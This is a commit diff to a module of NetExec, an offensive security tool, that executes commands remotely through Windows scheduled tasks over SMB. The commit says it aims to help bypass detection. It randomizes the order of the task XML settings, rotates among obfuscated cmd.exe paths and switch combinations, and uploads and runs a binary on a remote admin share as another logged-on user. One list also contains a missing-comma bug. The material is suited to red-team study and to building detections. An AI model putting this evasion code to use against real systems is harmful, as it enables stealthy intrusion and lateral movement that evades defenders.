Merge pull request Pennyw0rth#721 from Kahvi-0/main

NeffIsBack · web-flow · commit 82b0f973f5db · 2025-08-15T19:13:24.000+02:00
Update schtask_as.py to help bypass detection
diff --git a/nxc/modules/schtask_as.py b/nxc/modules/schtask_as.py
@@ -18,7 +18,7 @@ def options(self, context, module_options):
         BINARY         OPTIONAL: Upload the binary to be executed by CMD
         TASK           OPTIONAL: Set a name for the scheduled task name
         FILE           OPTIONAL: Set a name for the command output file
-        LOCATION       OPTIONAL: Set a location for the command output file (e.g. '\tmp\')
+        LOCATION       OPTIONAL: Set a location for the command output file (e.g. 'C:\\Windows\\Temp\\')
 
         Example:
         -------
@@ -28,7 +28,7 @@ def options(self, context, module_options):
         self.command_to_run = self.binary_to_upload = self.run_task_as = self.task_name = self.output_filename = self.output_file_location = self.time = None
         self.share = "C$"
         self.tmp_dir = "C:\\Windows\\Temp\\"
-        self.tmp_share = self.tmp_dir.split(":")[1]
+        self.tmp_path = self.tmp_dir.split(":")[1]
 
         if "CMD" in module_options:
             self.command_to_run = module_options["CMD"]
@@ -46,7 +46,8 @@ def options(self, context, module_options):
             self.output_filename = module_options["FILE"]
 
         if "LOCATION" in module_options:
-            self.output_file_location = module_options["LOCATION"]
+            # Ensure trailing backslashes
+            self.output_file_location = module_options["LOCATION"].rstrip("\\") + "\\"
 
     name = "schtask_as"
     description = "Remotely execute a scheduled task as a logged on user"
@@ -57,29 +58,28 @@ def on_admin_login(self, context, connection):
 
         if self.command_to_run is None:
             self.logger.fail("You need to specify a CMD to run")
-            return 1
+            return
 
         if self.run_task_as is None:
             self.logger.fail("You need to specify a USER to run the command as")
-            return 1
+            return
 
         if self.binary_to_upload:
             if not os.path.isfile(self.binary_to_upload):
                 self.logger.fail(f"Cannot find {self.binary_to_upload}")
-                return 1
+                return
             else:
                 self.logger.display(f"Uploading {self.binary_to_upload}")
+                binary_file_location = self.tmp_path if self.output_file_location is None else self.output_file_location
                 with open(self.binary_to_upload, "rb") as binary_to_upload:
                     try:
                         self.binary_to_upload_name = os.path.basename(self.binary_to_upload)
-                        connection.conn.putFile(self.share, f"{self.tmp_share}{self.binary_to_upload_name}", binary_to_upload.read)
-                        self.logger.success(f"Binary {self.binary_to_upload_name} successfully uploaded in {self.tmp_share}{self.binary_to_upload_name}")
+                        connection.conn.putFile(self.share, f"{binary_file_location}{self.binary_to_upload_name}", binary_to_upload.read)
+                        self.logger.success(f"Binary {self.binary_to_upload_name} successfully uploaded in {binary_file_location}{self.binary_to_upload_name}")
                     except Exception as e:
-                        self.logger.fail(f"Error writing file to share {self.tmp_share}: {e}")
-                        return 1
+                        self.logger.fail(f"Error writing file to share {binary_file_location}: {e}")
+                        return
 
-        # Returnes self.command_to_run or \Windows\temp\BinToExecute.exe depending if BINARY=BinToExecute.exe
-        self.command_to_run = self.command_to_run if not self.binary_to_upload else f"{self.tmp_share}{self.command_to_run}"
         self.logger.display("Connecting to the remote Service control endpoint")
         try:
             exec_method = TSCH_EXEC(
@@ -122,7 +122,7 @@ def on_admin_login(self, context, connection):
         finally:
             if self.binary_to_upload:
                 try:
-                    connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.binary_to_upload_name}")
-                    context.log.success(f"Binary {self.binary_to_upload_name} successfully deleted")
+                    connection.conn.deleteFile(self.share, f"{binary_file_location}{self.binary_to_upload_name}")
+                    context.log.success(f"Binary {binary_file_location}{self.binary_to_upload_name} successfully deleted")
                 except Exception as e:
-                    context.log.fail(f"Error deleting {self.binary_to_upload_name} on {self.share}: {e}")
+                    context.log.fail(f"Error deleting {binary_file_location}{self.binary_to_upload_name} on {self.share}: {e}")
diff --git a/nxc/protocols/smb/atexec.py b/nxc/protocols/smb/atexec.py
@@ -1,4 +1,5 @@
 import os
+import random
 from textwrap import dedent
 from impacket.dcerpc.v5 import tsch, transport
 from impacket.dcerpc.v5.dtypes import NULL
@@ -80,51 +81,83 @@ def get_end_boundary(self):
         return end_boundary.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
 
     def gen_xml(self, command):
+        # Random setting order to help with detection
+        settings = [
+            "       <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>",
+            "       <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>",
+            "       <AllowHardTerminate>true</AllowHardTerminate>",
+            "       <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>",
+            "       <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>"
+        ]
+        random.shuffle(settings)
+        randomized_settings = "\n".join(settings)
+        settings2 = [
+            "       <AllowStartOnDemand>true</AllowStartOnDemand>",
+            "       <Hidden>true</Hidden>",
+            "       <Enabled>true</Enabled>",
+            "       <RunOnlyIfIdle>false</RunOnlyIfIdle>",
+            "       <WakeToRun>false</WakeToRun>",
+            "       <Priority>7</Priority>",
+            "       <ExecutionTimeLimit>P3D</ExecutionTimeLimit>"
+        ]
+        random.shuffle(settings2)
+        randomized_settings2 = "\n".join(settings2)
+        idleSettings = [
+            "         <StopOnIdleEnd>true</StopOnIdleEnd>",
+            "         <RestartOnIdle>false</RestartOnIdle>"
+        ]
+        random.shuffle(idleSettings)
+        randomized_idleSettings = "\n".join(idleSettings)
+
+        random_cmd_path = [
+            "cmd",
+            "cmd.exe",
+            "C:\\Windows\\System32\\cmd",
+            "C:\\Windows\\System32\\cmd.exe",
+            "C:\\Windows\\System32\\..\\System32\\cmd",
+            "C:\\Windows\\System32\\..\\System32\\cmd.exe",
+            "C:\\Windows\\..\\Windows\\System32\\cmd"
+            "C:\\Windows\\..\\Windows\\System32\\cmd.exe",
+        ]
+        cmd_path = random.choice(random_cmd_path)
+        random_cmd_arg = ["/c", "/C", "/Q /c", "/F:ON /c", "/T:fg /c", "/T:fg /Q /C", "/F:ON /Q /C"]
+        full_command = f"{random.choice(random_cmd_arg)} {command}"
+
         xml = f"""<?xml version="1.0" encoding="UTF-16"?>
-        <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+        <Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
         <Triggers>
-            <RegistrationTrigger>
-            <EndBoundary>{self.get_end_boundary()}</EndBoundary>
-            </RegistrationTrigger>
+           <RegistrationTrigger>
+           <EndBoundary>{self.get_end_boundary()}</EndBoundary>
+           </RegistrationTrigger>
         </Triggers>
         <Principals>
-            <Principal id="LocalSystem">
-            <UserId>{self.run_task_as}</UserId>
-            <RunLevel>HighestAvailable</RunLevel>
-            </Principal>
+           <Principal id="LocalSystem">
+           <UserId>{self.run_task_as}</UserId>
+           <RunLevel>HighestAvailable</RunLevel>
+           </Principal>
         </Principals>
         <Settings>
-            <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
-            <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
-            <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
-            <AllowHardTerminate>true</AllowHardTerminate>
-            <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
-            <IdleSettings>
-            <StopOnIdleEnd>true</StopOnIdleEnd>
-            <RestartOnIdle>false</RestartOnIdle>
-            </IdleSettings>
-            <AllowStartOnDemand>true</AllowStartOnDemand>
-            <Enabled>true</Enabled>
-            <Hidden>true</Hidden>
-            <RunOnlyIfIdle>false</RunOnlyIfIdle>
-            <WakeToRun>false</WakeToRun>
-            <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
-            <Priority>7</Priority>
+           {randomized_settings}
+           <IdleSettings>
+           {randomized_idleSettings}
+           </IdleSettings>
+           {randomized_settings2}
         </Settings>
         <Actions Context="LocalSystem">
-            <Exec>
-            <Command>cmd.exe</Command>
+           <Exec>
+           <Command>{cmd_path}</Command>
         """
+
         if self.__retOutput:
             file_location = "\\Windows\\Temp\\" if self.output_file_location is None else self.output_file_location
             if self.output_filename is None:
-                self.__output_filename = os.path.join(file_location, gen_random_string(6))
+                self.__output_filename = os.path.join(file_location, gen_random_string(8))
             else:
                 self.__output_filename = os.path.join(file_location, self.output_filename)
-            argument_xml = f"      <Arguments>/C {command} &gt; {self.__output_filename} 2&gt;&amp;1</Arguments>"
+            argument_xml = f"      <Arguments>{full_command} &gt; {self.__output_filename} 2&gt;&amp;1</Arguments>"
 
         elif self.__retOutput is False:
-            argument_xml = f"      <Arguments>/C {command}</Arguments>"
+            argument_xml = f"      <Arguments>{full_command}</Arguments>"
 
         self.logger.debug("Generated argument XML: " + argument_xml)
         xml += argument_xml
@@ -147,7 +180,6 @@ def execute_handler(self, command):
         dce.connect()
 
         xml = self.gen_xml(command)
-
         self.logger.debug(f"Task XML: {xml}")
         self.logger.info(f"Creating task \\{self.task_name}")
         try:
@@ -178,7 +210,6 @@ def execute_handler(self, command):
 
         if self.__retOutput:
             smbConnection = self.__rpctransport.get_smb_connection()
-
             tries = 1
             # Give the command a bit of time to execute before we try to read the output, 0.4 seconds was good in testing
             sleep(0.4)
@@ -211,7 +242,6 @@ def execute_handler(self, command):
                         self.logger.debug(f"Exception when trying to read output file: {e!s}. {self.__tries - tries} tries left, retrying...")
                         tries += 1
                         sleep(1)
-
             try:
                 self.logger.debug(f"Deleting file {self.__share}\\{self.__output_filename}")
                 smbConnection.deleteFile(self.__share, self.__output_filename)
